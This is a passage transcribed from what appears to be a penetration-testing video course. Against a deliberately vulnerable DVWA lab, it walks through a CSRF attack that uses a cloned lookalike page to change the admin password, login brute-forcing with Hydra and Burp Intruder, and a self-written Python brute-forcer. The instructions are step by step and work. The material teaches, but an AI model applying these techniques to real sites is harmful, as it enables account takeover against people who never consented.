people think that this is something similar or the same as XSS or cross-site scripting, but that is not the case. In cross-site request forgery, the attacker makes the identified user execute something that they didn't want to execute. CSRF attack can be used to exploit any web function that searches for one request inside of the identified session in case the security applied isn't efficient enough. Some of the things that you can do with cross-site request forgery would be something like changing details about a specific user, like email addresses, date when they were born, and so on and so on. You can also perform fake banking transactions, adding items to buy on a certain page, but this is not something that we can accomplish easily. For this attack, we need a victim that has active identified session inside of the website, and they will also have to visit our URL link that we craft in order for this to work. Now, let's take a look at simple example of how to do this on our DVWA page. So start your Metasploitable, visit the page as usual. We want to go to the DVWA and we can log in right here. But remember that we did the SQL injection. We no longer have to log in as admin user. We can log in as any other user from the data that we extracted with our SQL injection. So if you remember, we had a user called Gordon who had the username of Gordon B, and his password was ABC123. If you remember that we got his MD5 hash, then we pasted it inside of the Google, and we got that his hash was equivalent to a string of ABC123. So we can log in as Gordon. And we can see down here, you have logged in as Gordon B. Now let's set the security to low. And let's navigate to CSRF right here. So we can see vulnerability, cross-site request forgery, and the application requires us to change our admin password. So we got the new password and confirm new password. What we can do is we can, for example, type password 123 and confirm password to be password 123. If I click on change, it says password changed, and let's see whether it indeed got changed. So if I log in as admin and then password, remember that before it was just password, now it is password 123. If I log in, well, now it will work. We successfully changed the password. But how can we use this to exploit it? Well, if I go right click and go on view page source, there will be a vulnerable part of code inside of this page. And that part of code will be the form where we submit the new password. If we scroll all the way down, here is the part of the code that is vulnerable. We got the form where we can submit the new password, where we can also reconfirm the new password, and you will notice that this is under the vulnerable code area. So what we can do with CSRF is we can copy this vulnerable form where we submit the username and password, and we're going to create our small HTML page that we're going to host on our Apache 2 web server. And you're going to see in just a second why we do that. So I'll open a terminal and I will navigate to the directory of our web server. And if you remember, that is /var/www/html. Now, since we can't write files right here as a regular user, let us enter the root account. If I type ls, we got our tester.py, we can remove it, we no longer need it here, and once you got this directory clear and empty, let us nano csrf.html file. Let's call it like that. Now feel free to call it anything that you want, just make sure that you have this HTML extension onto this file. Now that we opened it, we can paste the code that we copied from the page, and you will notice it is the form where we change our password. Now, there are a few things that we want to change right here. For example, this action, we want to change to the page link where we change our password on our DVWA. And that page link is this link right here. Let's copy it. Let's paste it right here. And what this action simply refers to is once we change the password, it will redirect us to whatever page is inside of this action field. So it will just redirect us back to this page right here. Let's copy this and paste it. Now that we got the page right here, there are two more things that we need to add in order for this attack to work, and that is inside of these input fields. So we got the name of the field, which is password new. I believe it is this field right here, and the second field is confirm new password, which is this field right here, password confirm. We want to automatically add value to those fields, and in this case, that value will be a new password. So what we can do is we can type space right after the password name, and we can type value equals, open double quotes, and in between the double quotes, we can type the new password. Let's say the new password is hacked. We must do that for the second field as well. So value equals, open double quotes, and then hacked. Now, you will notice once we visit this page that in that case, the fields will already be completed. They will have this hacked value inside of both of these fields. Let's give it a try. If I save this, Control O, and I start my Apache 2 web server by typing service Apache 2 start. All we need to do right now is visit our localhost and the csrf.html file, which is the only file inside of our Apache 2 web server directory. So we got this right here. And this is the link that we would want to send to our victim. Now I know it doesn't nearly look as good as this page right here, but let's just give it a try to see if it works. If we did everything correctly, once we click on this change button on our localhost CSRF file, we will successfully change the password of the admin account on this DVWA page. So we send this to the target clicks on change, and we get redirected to our Metasploitable DVWA CSRF page, and it says password changed. Let's see whether it indeed got changed. Remember, we typed the value of hacked, and now if I go right here and type admin and hacked, well, it worked. We logged in with new password that someone typed in while visiting our page on our local host. But if you noticed on this page, we only copied the form, and if we were to host just the form code on our Apache 2 server, like we're doing right now, it would look suspicious because if we take a look at this page and this page, they don't look nearly the same. So how can we make it look the same? Well, first thing that we must do is we must go right here, right click, view page source, and we must copy the entire HTML code and not just the form. So what you can do is you can select the page, type Ctrl A, it will select all the code inside of this file and we can copy it. Then we can go to our Apache web directory and we can remove the CSRF file and we can nano new one. Here we will paste the entire code. And remember that we must do the same thing that we did inside of our form. So find the form code, and here we want to put the link to our page, which is this link once again. Copy it, paste it right here. We also want to add the value to our password fields. We can change right now the password back to password, just so we put it back as it was. And now that we did this, we can save this, and if I go and visit the page once again, or I just reload this page, well, it looks a little bit better, but it is still not the same page. We're missing some decoration that this page has. And if you have some experience in web development, you will know that we're missing the CSS file. So what we can do to add the CSS file is we can go to this page source of our page that we got open, and we can navigate to the CSS file. So just search for any file type that ends with .css. And if I go up here, here is one of them, and it is called main.css. And by looking at this page, it seems that this is the only CSS file that this page has. So let's click on that, and here is the CSS code that we also must save in the same directory as our HTML file. So let's select everything, copy this, and let's go back to our web directory. Right here we are going to nano main.css, and let's just paste all of this code. Now that we have the CSS code right here, we can save this, but it will still not work if we don't change the file location inside of our code. Because if you take a look at right here, where we add the CSS file, it is still the location on our Metasploitable machine. And since we have it in the same directory as our HTML file on our Apache 2 web server, what we can do is we can just remove the entire path and leave just the name of the file, because they're both located in the same directory. So we can just leave it like this. Then we can save this. And now if we refresh our localhost page, well, now it looks the same. Just this page isn't zoomed in, so what we can do is we can zoom this in and they look exactly the same. So the password is, remember right now, just password, and if we click on change, it will redirect us to the real page and it will say the password has changed. Let's give it a try once again and see whether it indeed got changed. So I will just go to my DVWA page, log out, and type admin and then password. And we did it again. Just this time we made our page look exactly the same, as we can see right here. Great. This is the CSRF attack, or cross-site request forgery attack. As you can see, it requires to open our link, otherwise this will not work. But if you manage to trick them by making the page look identical, then this attack will work and you will successfully change their password. Now this can be performed on other stuff and not just the password fields. As we remembered, you can use this to change emails, to change dates, and many other things as well. Now that we covered this, in the next video, we're going to cover brute force attack. And we're going to see how we can perform the brute force attack in two different ways. So thank you for watching, and I will see you in the next lecture. Bye. Welcome back. And in this lecture, I want to talk about the subject on brute forcing different login pages. So we talked about many different attacks that were based on some type of a vulnerability, either a code injection or CSRF attack or command injection. All of those were bugs that we covered. But we haven't covered how to brute force a login page. And for this entire section, we have been logging into this username and password field whenever we want to access the DVWA page. Let's say that we don't have the credentials for this page. We know, of course, that they are admin and password, but let's also see how we can try to brute force them, how we can try to guess the credentials. Of course, for this, we're going to need to have a little bit of luck because this will require that inside of the password list that we're going to use, we have their password there. So this will only work if their password is pretty weak, which in our case it is, since the password is just password. For this, we're going to use a tool called Hydra. And Hydra is already pre-installed in Kali Linux, so you can just type Hydra inside of your terminal, and this will give you the help menu of the tool. However, I advise you not to look at this help menu because it will be in no way helpful for these types of the attacks. As we can see right here, it gets the example of usage, but once attacking the actual web pages, this becomes harder and harder to use. The syntax becomes harder and harder. So I advise you to actually pay attention once I'm writing syntax so you can see how exactly am I doing it, because for every web page that has a login page with username and password, this syntax will be different. So let's start crafting our command. We're going to start with Hydra, and then after it we specify the IP address of our target, which in my case is 192.168.1.9, as we can see right here. Then you got a few options that you need to specify right here, which are based on how are you sending the username and password to the target. So in this case, if I type test right here and test as password, I click on login, this is being sent as a post form. So we are applying these usernames and passwords to the form, and we are sending this to the target with post request. You can always check that right here inside of your burp suite. So you can go down here and we can see that this is a post request where we send the test username and test password. Okay, so how we can specify that inside of Hydra? Well, we can specify http-form-post. After this, you need to open the double quotes, and in between the double quotes, the first argument that you must specify for the page that you're brute forcing is the path to that page, which requires username and password. And in our case, that path is /dvwa/login.php. So that is the first argument specified in between the double quotes, and arguments that you specify between these double quotes are separated with 2 dots. So once we type the path, we type 2 dots for the second argument, and the second argument is the username. So for this, we must go to the page that we are brute forcing, we must right click and go to view page source, and we must find the name for the username field inside of the code. Usually the username and password fields will be inside of some type of a form, as we can see right here, form action login.php method post, and if I go to the label for the username, we can see that the name for the username field is simply just username. Okay, so we must copy the name of this field, and we must go right here and type it in. So paste it right after, and this username field will be equal to upper arrow and capital user, and then once again upper arrow. Now you might be wondering what is happening here. Well, after we specify the name of the field on our page, we equal that to this syntax right here, and this is just Hydra syntax. You use this upper arrow right here, and you type user in between that, and you close it with upper arrow. What this is telling to the program to do is it will exchange any username that we have in a list between these 2 upper arrows. So essentially, any type of username from the list that we're going to use will be stored right here. But this is not the only field that we have. We also must specify the same thing for the password field. Now, to separate the username field from the password field, we use this sign right here. So specify this sign, and then after it, we can specify the password field name, just like we did right here. So let's go and find the label for the password. Here it is. And the name for the password field is simply just password. And this is something that can change depending on which page you are brute forcing. So let's go right here and type password, which is the name of our field, and this will be equal to upper arrow and then pass, and then once again upper arrow. And this is also the same as with the username, so just any passwords that we use from our list will get stored right here instead of this capital pass. And the last thing that we must set for this second argument of our command is the button that we're using. So every time you actually try to log in, you click on this login button. And this is something that we also want to simulate inside of our Hydra command. To do that, we go view page source, we find the button, which is usually right after the username and password field, and in our case here it is. We take a look at the type of button and the button name. So we can see that the button name is login, which we are going to specify, and then we're going to equal that to submit. So we can do it like this. Again, we need to separate it with this sign right here, and we type the name of the button, which is login, and then equal to the type of the button, which is in our case submit. So we equal that to submit. And these three steps right here, which is username, password, and button, are enough for us to actually submit a request for a specific username and password. But we also need to differentiate a valid username and valid password from the incorrect username and incorrect password. So how are we going to do that? Well, luckily Hydra allows us to specify something that will stick out once a password is incorrect. And if we go to our page and we specify the incorrect username and incorrect password, once you click on login, you will notice that down here we have this string that says login failed. Now, just by thinking, we can figure out that this string will not exist if we manage to log in with successful credentials. So we can specify this string to our Hydra command to search for it, and every time it finds it, it will not print out that username and password as valid username and password, because they are incorrect. So we can specify it with 2 dots and then paste it right here. Login failed will be the string that we are searching for, which will indicate that the username and password is incorrect. After we specify this, we can exit out of the double quotes, and all we're left to do is to specify -l and then the list for the usernames, which we are going to call usernames.txt, and -p, which will be the list for the passwords, which we are going to call passwords.txt. Now for these lists, you can use any type of list that you want. In my case, since we don't have them, I'm just going to create them real quick for the purposes of this tutorial. I need to make sure that I'm in the same directory where I'm running this command, and then I'm going to nano usernames.txt, and I'm going to type right here root account admin, then lowercase admin, password as a username, test123, and bunch of other things we are not going to specify. We can just leave it to be this small, just so we don't waste too much time brute forcing that page. And here we can type test 1 2 3 1 2 3 4 5 6 7 8 9, and then we can type admin root password and password 1 2 3. So we do have the correct username and the correct password inside of both of these lists. Now that we have this, what we can do is we can run our command. Let's just double check it real quick. So Hydra, the IP address of our target. We're using the HTTP form post because we are sending a post request and we are sending our username and password inside of a form. Then we open double quotes, and the first argument is going to be the path to the page that the login form is located in. The second argument is going to be username, password, and the button that we are submitting the username and password with. And the third argument inside of double quotes is going to be a string that we get once we specify the incorrect username and password. After it, we just specify -l for the usernames list and -p for the passwords list. If I click enter, and here it is. It managed to find the correct username and correct password. It printed it out right here, and it tells us that the username is admin and that the password is password. So it finished relatively quick, but it only had around 49 login tries, as it says right here. So you can feel free to use a bigger password lists in order to give this even higher chances to work. Now that we did this, let's give it a try and let's log in with the username and password that we got, and it indeed works. So our tool successfully brute forced the login. Now, in the next video, we're also going to take a look at how we can brute force this page right here, which is the brute force login page inside of our DVWA. Welcome back. And in this video, I want to talk about another cool feature of burpsuit that could allow us to perform the brute forcing of a login page a lot more easier than we did with Hydra tool. So burpsuit, besides you being able to inspect all the packets and intercept the packets and change them, you can also do some other cool things as well. And one of those cool things is brute forcing a login page. Now this is something that we're going to perform with the community version, and the community version of burpsuit has some limitations. The brute forcing will not go as fast as if you, for example, had the pro version, but nonetheless, let us see how it would look like. So let's go and visit the login page of our DVWA. If I navigate right here, and here we must log into our DVWA. The first thing that we want to do is we want to specify any credentials right here, for example, test and test. And once we click on login, this request that we just performed on our DVWA page will be saved inside of our burpsuit. So under the targets, we got our target machine right here. And if I find the packet, here it is. Here is the packet that we sent. So we sent the post request and we sent our username of test and password of test to the target web page. Now, what we want to do in order to perform the brute forcing attack is we want to first right click on this packet, which we use to send our username and password, and we want to send it to intruder. Click on that and you will see this intruder bar light up. You want to navigate to the intruder, and here there are some options that we want to set before being able to brute force a web page. So here under the target tab, there is nothing that we want to change. Let us just move on to the positions tab, and in the positions tab you will see this request that we just sent. You will see some of the fields that are already selected, and you will see this attack type bar up here. The first thing that we want to change is we want to change the attack type from sniper to cluster bomb. And what this simply means is, since we're going to brute force both username and password, we want to be able to send both of them at the same time, and we can do that with the help of cluster bomb. If you, for example, knew the username and you just wanted to brute force the password, you could select right here sniper, and then you could just brute force a password. Right now we're going to go with the cluster bomb, and here we got 5 fields selected. Now we don't need all of them, we only need the username and password field selected. So what we can do is we can click on this clear button. It will unselect all of these fields, and then to select the fields that we want, we can just double click on the field. For example, username equals test. I double click on test, it will select it, then I click on add, and I do the same for the password, select it right here, and I click on add. This will select just username and password, and once we do that, we can navigate to the payloads tab, where we're going to see a bunch of other options that we can also set. So under these payload sets, this will be the payload set for the username, and if I select this number 2, this will be the payload set for the password, because those are the only 2 fields that we selected. If I go with the username first, so I change right here to 1, I will select the payload type to be a simple list, because we're going to brute force with a list, and under the payload options, I want to load that list. So I just click on this load button, then I can find usernames.txt, and you can see by default it will load all of the usernames from that list. Now I can delete this empty field, we don't really need it, and once I do that, once I load the usernames list right here, I can change from 1 to 2, and now I leave it once again on simple list, and here I want to load the passwords.txt. So once again, I find the passwords.txt, and it will load all of the passwords from that file. Once all of that is ready, that would be pretty much it. We are ready to start our attack. So if I click right here on start attack, it will tell me that the community edition of burpsuit contains a demo version of burp intruder, so some functionality will be disabled. We already knew that, so let's just go and click on OK. And this will start our attack. Down here we can see the progress bar as to how fast this goes, and you will notice it goes a little bit slower than the Hydra tool, but nonetheless it is still brute forcing our page. Let's wait for it to finish. And it has finished, but it seems that we didn't get any results right here. And by the way, inside of the intruder, how we can search for results is you can see all of the combinations of usernames and passwords right here. We can see the status and we can also see the length. Now, the length for the correct username and password will in 99.9% of cases be different than the incorrect usernames and passwords. And in this case, it seems that all of them have the same length, so for some reason it didn't manage to find our correct username and password. Now, that could be due to many reasons, but if I just select one of the combinations and I go to the response, we get the 302 found. If I scroll down inside of the response, it doesn't give us any HTML content. This usually means that it is performing redirection. And if I go to our options inside of our intruder, all the way down under the options, we get follow redirections, never. So what I'm going to do is I'm going to check this on always, and I'm going to start the attack once again. Click on OK. And now we can see it has different type of length. Now all we need to do is wait for the combination of admin and password, and hopefully this time we're going to get different length of the response for the correct username and correct password. So let's wait for this to finish. Okay, so it has finished, and let's scroll all the way down. We can see every response has the length of 1638. And if I scroll down here, we can see that the combinations of admin and password, both capital and lowercase, have different length. This is a pretty good indication that these are the correct usernames and correct passwords. We can also see that it did indeed perform the redirection, as we can see multiple requests and multiple replies right here. So that would be about it. This is a simple way that you can perform brute forcing with the help of burpsuit. Now, I'll still prefer the Hydra tool due to it being a little bit faster than the burpsuit intruder, but this one, however, is easier to perform, since for Hydra you need to perform different type of syntax and sometimes it might not work, while this is just setting some of the options, selecting the fields and running the brute force attack. Now that we finished this, in the next section we are ready to start our coding projects regarding the web application penetration testing. See you there. Okay, time for another coding project. After a long section of covering web vulnerabilities, let's see how we can test some of them by using our own tools. For this, I have decided to show you two different projects. Now, both of them are going to be rather small and they work rather similar, so once we create one of them, we won't have any problem in figuring out how the second one works. These two projects are going to be login page brute forcer and directories brute forcer. In the first one, we're going to try to break a login password by only knowing the username, and in the second program, we're just going to see whether we can find some hidden directories on a web page, and maybe those directories could be useful for us. Nonetheless, both of these programs are going to work similar. Our login brute forcer is going to open a txt file with bunch of passwords, and we're going to send each one of those passwords from the file in hope that one of them is the correct one, which will grant us an access to that account. The second program is going to work by opening a txt file and reading common directory names that we will then request to visit, and if we manage to visit them and get status code 200, that means that page exists. If we get connection error, well, then that page doesn't exist. Nonetheless, enough of talking, we are already intermediate with our Python skills, so let's get straight into coding these two programs. See you in the next video. Welcome back. In this video, we're going to be creating a brute force tool using our Python skills. So, in the previous section where we talked about web application penetration testing, we covered tools that are used for brute forcing, but this time I want to see whether we can create our own tool that will be able to brute force a login page. Now, before we even start, I want to mention that this tool will not be universal, so for every different page you will have to perform some minor modifications, the same way that we did inside of our Hydra tool and inside of our burp suit. Nonetheless, let us see how we can create it. So if I type ls and navigate to my desktop directory, here we got the tools directory for our coding projects, and here I'm going to create the web app pentest directory. So I will navigate there, and currently this directory is empty. So let's nano our Python program. We can type nano and then bruteforce.py. Great. Now, there is only one library that we're going to need to perform this project, and that library is the requests library. It will allow us to automate the process of sending the get and post requests. So let's just import it straight away. And let's start our program. So first thing that we must think about is what are the information that we need from the user of this program in order to brute force a login page. So we will need a URL link to that page, and we're going to need a username for that specific account. Then we're going to run a bunch of passwords onto that username, and if we manage to guess the correct password, great, we're going to print it to the screen. If we don't manage to find the password, we're going to print password not in list. Simple as that. So let's start with those information first. Let's create a variable called URL, and that variable is going to be the input value, which means that the user of this program can input which web page they want to brute force. Let's open double quotes and specify that to them. Let's do it like this, enter page URL. Here they can enter the page URL, and right after we do that, we can create another variable called username, and this variable will do the same thing, so it will be the same input value, just this time we're going to ask for the username. So let's just type enter username for the account to brute force. And this is pretty much it for now. Now later we are going to add some other information regarding this project, but for now we only need these two variables. So how are we going to approach this? Well, first, since we have the URL and the username, we can start with opening a file that will contain the passwords that we're going to use to brute force. So we can do that with open, and we can call that file passwords.txt. And this is also something that we can ask the user, for example, input the name of the password file to use, and that would actually be a good thing. So what I'm going to do is this is another information that we're going to ask from the user, which is password file equals input and then enter password file to use. Simple as that. Let's not forget the single quotes, otherwise this will throw us an error. And let's close the brackets at the end. Now we can open that file by specifying password file, and we want to open it for reading. So we can specify just R between the single quotes, which means opening file for reading text. Now here we need to specify how we want to open it, so with open password file as passwords. That is how we're going to call our file object. Then we're going to enter a function, which I'm going to call cracking, and this function doesn't exist, we will have to code it, but nonetheless, this function will perform the brute forcing. This function will take two arguments. The first one is going to be the username, of course, that we specify at the beginning of the program execution, and the second argument will be the URL. Great. Now that we got this, we need to create the cracking function. And we're going to do that right here. So define cracking, and we specify username and URL as the arguments that it needs. So how are we going to do this? Well, we already mentioned that we are going to perform reading of the passwords. So for each password in this password list, we're going to try to send a request to that page with that password and the username. And if the response contains some valid argument that we have a valid username and password, we're going to print it to the screen as the correct username and password. And if we get something like login failed or something like that, we're going to move on to the next password. So how are we going to do that? Well, we already opened the file for reading that contains our passwords, and now what we can do is we can type for password in passwords, and remember passwords is our file. Then for each password inside of that passwords file, we can first strip it out of any additional characters using the strip function, so password will be equal to password.strip. This will remove any, for example, empty characters or something like that might cause us a problem in brute forcing this page. Then once we do that, we're going to print to the screen trying and then the password that we're currently trying, just so the user of the program can see which password is it currently trying to brute force. Once we do that, we need to send the request to that page. So how can we do that? Well, in this case, since we're going to brute force, as usual, our DVWA login page first, if I log out, we know that this is being sent with post form. So the method of sending the usernames and passwords is post, and we can check that once again just by finding the form, and we can see that the method is post. That's why inside of our code, we're going to type requests.post, and we're posting, and this request.post takes two arguments. In our case, the first one is going to be the URL, which is logical because we need to tell our program where you want to post that data, and the data that we want to post will be equal to this, data equals data. Just, we don't have the data yet. We need to tell our program what is our data. So how can we do that? Well, we can go right here and define data, and data has to be a dictionary. Inside of this dictionary, we have a key and the value, and we need to specify all the information that the program needs in order to perform a successful login. And that information would most likely be the username, the password, and the button that it has to click. Remember the same thing we had in Hydra tool. We need to click on this button in order to successfully submit the username and password. So how can we define it right here? Well, we define it like this: username, username. And this username is just the name of the field on our page, and this is the part of the program that you might need to change depending on the page that you're brute forcing. If the username field on the page that you're brute forcing is called something like user, then you must change this to user. And this right here is just the username that we're sending, which is the one that we ask the user of the program to input at the beginning of execution. The same thing we must do for passwords, and the reason why I'm already typing the username fields is because I already know that the name of the fields is username and password, because we already checked that in our web application penetration testing section. Okay, once we do that, we can do the same for password. And once again, we need to put the password into that password field, and the password will be this stripped value that we read from our passwords file, or from our passwords list. And the last argument that we need to specify is going to be the button. As you remember, once we send it right here, the button name is login and the type of button is submit. So we must specify it like that. Just this time, both of these values are going to be between the single quotes because none of them is an actual variable. So this is going to be our data. And in this requests.post, we're sending that data to our URL. And luckily our request library will perform everything else for us, so it will know where to put this data that we're sending. Of course, instead of just sending this data, we also want to store the response somewhere. So we can create a response variable, and that response variable will be equal to whatever the return value is from this requests.post function. And the return value is going to be the HTML page of the response. Once we receive the response, we have to check whether the password was correct or not. So how can we do that? Well, we can do that the same way that we did inside of our Hydra. Remember that in Hydra we had to specify the string that occurs once we specify the incorrect username and password. which is this down here, as we can see login failed, well, we can do something similar inside of our program. Let's ask the user of the program first. We can create a variable login failed string, and we can ask the user enter string that occurs when login fails. Simple as that. And once they enter the string, hopefully they enter something like failed or login failed. They don't have to enter the entire thing, they can just enter failed, which occurs on this page once you specify incorrect username and password. Then what we can do is we can check whether we find that string inside of our response. Now, to do that, we must type the if statement. And if statement will be something like this. If login underscore failed underscore string in response.content.decode, then we have the incorrect password. And the reason why we're decoding this is because otherwise it won't be able to find this value inside of our content. So we must decode it first, and then it is basically searching for this string inside of the HTML page of the response. If it finds that string, that means we found the incorrect password, because that occurs only when it is incorrect. That's why we're just going to pass. We're not going to do anything. And if it doesn't find, which would be the else statement, then what we can do is we can print found username, and we can plus the username, and we can print the same thing for the password. So found password and plus password. So this will print the current username, which is always the same, and it will print the current password, which is currently in this iteration of this loop, which will be the correct password because it didn't find this string inside of it. After we find it, we can just exit the program. There is no need to continue brute forcing, so we can just exit out of the program. Okay, now that we did this, let us see whether this works. So if I go down here, and once we finish the cracking of the function, we can also print at the end, in case it doesn't find anything, password not in list. So we can just do it like this. Once it finishes the cracking function, it will go to this statement and it will print password not in list. If it finds the password, it will go to this statement right here and it will exit out of the program, so this will never get printed. Let's give it a try to see whether this works. So if I Ctrl-O to save, and the first thing that I want to do is I want to copy the passwords.txt file that I got on my desktop to the home Mr. Hacker desktop, tools, and then web app penetration testing. And if I ls, here we're going to have our passwords.txt file. And since this seems to be an incorrect passwords.txt file, I'm just going to delete this and I'm going to create a new one. Not really sure where is the last one, but let's just create it real fast. So the passwords can be something like test 123, 123, 4, 5, 6, 7, password 123, admin, root, and then the correct password. So we're just going to write password right here. And let's also write the password for the Gordon account, just so we can test two different accounts. And let's write another incorrect password at the end, which could be ABC. Okay, this is just the test example of the program, and let's Ctrl-O, and let's Python 3 our brute forcer.py. So the first argument that it asks is the page URL. So what we can do is we can visit that page, copy the link to that page, and paste it right here. http://192.168.1.2/dbwa and then /login.php. Click enter. It asks for the username for the account to brute force. We're going to use admin. The password file to use is passwords.txt. And make sure if the password file that you want to use is outside of the directory of your program, you will need to specify the entire path to that file. Once we do that, let's click enter, and it asks us for the string that occurs when login fails, and we can just type login failed, because that is what occurs on our page right here. For different pages, this will be different. Press enter, and it found the correct username and correct password. And it did it really fast. It tried these 7 passwords, none of those worked, then it ran onto the password and it printed out found username and found password. Let's also try for the Gordon just to make sure everything works. So I'm going to paste the link, or just type it in. The username is this time going to be Gordon B. The passwords file is going to be passwords.txt, and the string is going to be once again login failed. Press enter, and it also finds the username and the password for that account as well. Great, our program works. But let's also see how would we be able to brute force the inner page of this DVWA program or application. We also got this brute force page right here. But this is something that we'll have to brute force differently. Why? Well, first, it requires different type of request. It requires the GET request. And the second thing is this can only be brute forced within a current session. So if we are not logged into this page, we cannot even access this brute force page, and therefore we cannot really brute force. So we must also